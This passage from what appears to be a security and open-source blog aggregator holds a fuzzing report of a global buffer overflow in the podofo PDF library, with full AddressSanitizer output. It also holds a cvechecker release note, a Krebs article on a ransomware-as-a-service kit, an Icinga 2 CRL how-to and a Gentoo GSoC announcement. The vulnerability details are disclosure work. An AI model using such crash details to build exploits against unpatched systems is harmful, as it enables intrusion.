https://github.com/asarubbo/poc/blob/master/00172-podofo-nullptr-PoDoFo-PdfColor-operator

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.


podofo: global buffer overflow in PoDoFo::PdfParser::ReadXRefSubsection (PdfParser.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

Fuzzing it uncovered a global buffer overflow. The upstream project does not allow me to open a new ticket, so I will just forward this to the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==15599==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000014a5838 at pc 0x0000004ca58c bp 0x7ffebe3248b0 sp 0x7ffebe324060
WRITE of size 24 at 0x0000014a5838 thread T0
    #0 0x4ca58b in __asan_memcpy /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413
    #1 0x7efe75862464 in void std::_Construct(PoDoFo::PdfParser::TXRefEntry*, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_construct.h:83:38
    #2 0x7efe75862464 in void std::__uninitialized_fill_n::__uninit_fill_n(PoDoFo::PdfParser::TXRefEntry*, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_uninitialized.h:202
    #3 0x7efe75862464 in void std::uninitialized_fill_n(PoDoFo::PdfParser::TXRefEntry*, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_uninitialized.h:244
    #4 0x7efe75862464 in void std::__uninitialized_fill_n_a(PoDoFo::PdfParser::TXRefEntry*, unsigned long, PoDoFo::PdfParser::TXRefEntry const&, std::allocator&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_uninitialized.h:355
    #5 0x7efe75862464 in std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator >::_M_fill_insert(__gnu_cxx::__normal_iterator<PoDoFo::PdfParser::TXRefEntry*, std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator > >, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/vector.tcc:496
    #6 0x7efe75855a47 in std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator >::insert(__gnu_cxx::__normal_iterator<PoDoFo::PdfParser::TXRefEntry*, std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator > >, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_vector.h:1073:9
    #7 0x7efe75855a47 in std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator >::resize(unsigned long, PoDoFo::PdfParser::TXRefEntry) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_vector.h:716
    #8 0x7efe75855a47 in PoDoFo::PdfParser::ReadXRefSubsection(long&, long&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:772
    #9 0x7efe758470ad in PoDoFo::PdfParser::ReadXRefContents(long, bool) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:725:17
    #10 0x7efe75840a9e in PoDoFo::PdfParser::ReadDocumentStructure() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:337:9
    #11 0x7efe7583de0f in PoDoFo::PdfParser::ParseFile(PoDoFo::PdfRefCountedInputDevice const&, bool) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:220:9
    #12 0x7efe7583c1d4 in PoDoFo::PdfParser::ParseFile(char const*, bool) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:164:11
    #13 0x7efe75a993f3 in PoDoFo::PdfMemDocument::Load(char const*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfMemDocument.cpp:186:16
    #14 0x7efe75a990c2 in PoDoFo::PdfMemDocument::PdfMemDocument(char const*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfMemDocument.cpp:88:11
    #15 0x51e96d in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:110:20
    #16 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #17 0x7efe7424861f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #18 0x428718 in _start (/usr/bin/podofocolor+0x428718)

0x0000014a5838 is located 0 bytes to the right of global variable 'PoDoFo::PODOFO_BUILTIN_FONTS' defined in '/tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfFontFactoryBase14Data.h:4460:33' (0x14a4aa0) of size 3480
SUMMARY: AddressSanitizer: global-buffer-overflow /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413 in __asan_memcpy
Shadow bytes around the buggy address:
  0x00008028cab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028cac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028cad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028cae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028caf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x00008028cb00: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15599==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6844

Reproducer:
https://github.com/asarubbo/poc/blob/master/00171-podofo-globaloverflow-PoDoFo-PdfParser-ReadXRefSubsection

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.


cvechecker 3.7 released

Postby Sven Vermeulen via Simplicity is a form of art... »

After a long time of getting too little attention from me, I decided to make a new cvechecker release. It contains only a few changes, but I am planning to make another release soon with lots of clean-ups.

What has been changed

So, what has changed? With this release (now at version 3.7), two bugs have been fixed: one involving a wrong URL in the CVE download, and the other concerning the handling of CVE sequence numbers.

The first bug was an annoying one, which I should have fixed a long time ago. Well, it was fixed in the repository, but I didn't make a new release for it. When downloading the nvdcve-2.0-Modified.xml file, the pullcves command used the lowercase filename, which doesn't exist.

The second bug is about parsing the CVE sequence. In January 2014 the syntax changed to allow sequence identifiers longer than 4 digits. The cvechecker tool, however, performed a hard validation on the length of the identifier and truncated longer fields.

That means that some CVE reports failed to parse in cvechecker, and thus cvechecker didn't "know" about these vulnerabilities. This has been fixed in this release, although I am not fully satisfied...
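As a sketch of what the relaxed validation has to accept: since the 2014 syntax change, the sequence part of a CVE identifier may be 4 *or more* digits, so a parser must not assume a fixed width. The `is_cve` helper below is a hypothetical illustration, not cvechecker's actual code:

```shell
# Hypothetical check of the post-2014 CVE identifier syntax:
# "CVE-" + 4-digit year + "-" + a sequence of 4 OR MORE digits.
is_cve() {
    echo "$1" | grep -Eq '^CVE-[0-9]{4}-[0-9]{4,}$'
}

is_cve "CVE-2014-0001"    && echo "valid"    # classic 4-digit sequence
is_cve "CVE-2014-1234567" && echo "valid"    # longer sequence, also valid
is_cve "CVE-2014-123"     || echo "invalid"  # too short, rejected
```

A fixed-width parser that cut the sequence at 4 digits would mangle `CVE-2014-1234567` into `CVE-2014-1234`, which is exactly how the affected reports were lost.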

What still needs to be done

The codebase for cvechecker dates from 2010 and is actually based on a prototype I wrote and then decided not to rewrite into proper code. As a result, the code is not up to par.

I'm going to gradually improve and clean up the code in the next few [insert timeperiod here]. I don't know if there will be feature improvements in the next few releases (not that there aren't many feature enhancements needed) but I hope that, once the code is improved, new functionality can be added more easily.

But that's for another time. Right now, enjoy the new release.

Ransomware for Dummies: Anyone Can Do It

Postby BrianKrebs via Krebs on Security »

Among today’s fastest-growing cybercrime epidemics is “ransomware,” malicious software that encrypts your computer files, photos, music and documents and then demands payment in Bitcoin to recover access to the files. A big reason for the steep increase in ransomware attacks in recent years comes from the proliferation of point-and-click tools sold in the cybercrime underground that make it stupid simple for anyone to begin extorting others for money.

Recently, I came across an extremely slick and professionally produced video advertisement promoting the features and usability of “Philadelphia,” a ransomware-as-a-service crimeware package that is sold for roughly $400 to would-be cybercriminals who dream of carving out their own ransomware empires.

This stunning advertisement does a thorough job of showcasing Philadelphia’s many features, including the ability to generate PDF reports and charts of victims “to track your malware campaigns” as well as the ability to plot victims around the world using Google Maps.

“Everything just works,” claim the proprietors of Philadelphia. “Get your lifetime copy. One payment. Free updates. No monthly fees.”

One interesting feature of this ransomware package is the ability to grant what the program’s architects call “mercy.” This refers to the desperate and heartbreaking pleas that ransomware purveyors often hear from impecunious victims whose infections have jeopardized some priceless and irreplaceable data — such as photos of long lost loved ones.

I’ll revisit the authors of this ransomware package in a future post. For now, just check out their ad. It’s fairly chilling.


Using CRLs in Icinga 2

Postby Sebastian Marsching via Open Source, Physics & Politics »

Icinga 2.x offers a cluster mode which (from an administrator's point of view) is one of the most important features introduced with the 2.x release. Using the cluster feature, check commands can be executed on satellite nodes, or even the complete scheduling of checks can be delegated to other nodes, while the configuration is still kept in a single place.

In order to enable secure communication within the cluster, Icinga 2 uses a public key infrastructure (PKI). This PKI can be managed with the icinga2 pki commands. However, there is no command for generating a CRL. For this reason, it is necessary to use the openssl ca command for generating a CRL. I have documented the steps necessary for generating a CRL in my wiki.
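A minimal sketch of generating such a CRL with `openssl ca` might look as follows. To keep the example self-contained it sets up a scratch CA database and key; all paths, file names, and config values here are placeholders, not Icinga 2 defaults (an actual Icinga 2 CA typically lives under /var/lib/icinga2/ca/ as ca.crt and ca.key):

```shell
# Scratch CA database for `openssl ca` (placeholder layout).
set -e
mkdir -p ca
touch ca/index.txt          # certificate database, empty to start
echo 1000 > ca/crlnumber    # CRL number file (hex), makes a v2 CRL

# Throwaway CA key and certificate; with a real setup you would point
# the config at your existing Icinga 2 CA files instead.
openssl req -x509 -newkey rsa:2048 -nodes -subj '/CN=Scratch Icinga CA' \
    -keyout ca/ca.key -out ca/ca.crt -days 3650

# Minimal config so that `openssl ca -gencrl` finds its database.
cat > ca/ca.cnf <<'EOF'
[ ca ]
default_ca = scratch_ca

[ scratch_ca ]
database         = ca/index.txt
crlnumber        = ca/crlnumber
certificate      = ca/ca.crt
private_key      = ca/ca.key
default_md       = sha256
default_crl_days = 30
EOF

# To revoke a decommissioned node's certificate, you would first run:
#   openssl ca -config ca/ca.cnf -revoke satellite1.crt

# Generate the CRL and inspect it.
openssl ca -config ca/ca.cnf -gencrl -out ca/icinga2.crl
openssl crl -in ca/icinga2.crl -noout -text | head -n 3
```

The CRL produced this way can then be handed to Icinga 2; the exact steps for wiring it into the Icinga 2 configuration are documented in my wiki.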

Funnily enough, it seems that no one has used a CRL with Icinga 2 so far. I know this because, up to today, Icinga 2 has had a bug that makes it impossible to load a CRL. Luckily, yours truly has already fixed this bug, and the fix is going to be included in the next Icinga 2 release.

I find it strange that obviously no one is using CRLs, because Icinga 2 uses a very long validity period when generating certificates (15 years), so it is quite likely that at some point a node is decommissioned and thus the corresponding certificate has to be revoked.

Gentoo is accepted to GSoC 2017

Postby calchan via Denis Dupeyron »

There was good news in my mailbox today. The Gentoo Foundation was accepted to be a mentor organization for Google Summer of Code 2017!

What this means is we need you as a mentor, backup mentor or expert mentor. Whether you are a Gentoo developer and have done GSoC before does not matter at this point.

A mentor is somebody who will help during the selection of students, and will mentor a student during the summer. This should take at most one hour of your time on weekdays when students actually work on their projects. What’s in it for you, you ask? A pretty exclusive Google T-shirt, a minion who does things you wouldn’t have the time or energy to do, but most importantly gratification and a lot of fun.

Backup mentors are for when the primary mentor of a student becomes unavailable for an extended period, typically for medical or family reasons. It rarely happens but it does happen. But a backup mentor can also be an experienced mentor (i.e., have done it at least once) who assists a primary mentor who is doing it for the first time.

Expert mentors have a very specific knowledge and are contacted on an as-needed basis to help with technical decisions.

You can be any combination of all that. However, our immediate need in the coming weeks is for people (again, not necessarily mentors or devs) who will help us evaluate student proposals.

If you’re a student, now is the right time to start thinking about which project idea you would want to work on during the summer. You can find ideas on our dedicated page, or you can come up with your own (these are the best!). One note though: you are going to be working on this full-time for 3 months (i.e., 8 hours a day; we don’t allow another job, even part-time, next to GSoC, although we do accommodate students who have a limited amount of classes or exams), so make sure your idea can keep you busy for that long. Whether you pick one of our ideas or come up with your own, it is strongly recommended to start discussing it with us on IRC.

As usual, we’d love to chat with you or answer your questions in #gentoo-soc on Freenode IRC. Make sure you stay long enough in the channel and give us enough time to respond to you. We are all volunteers and can’t maintain a 24/7 presence. It can take up to a few hours for one of us to see your request.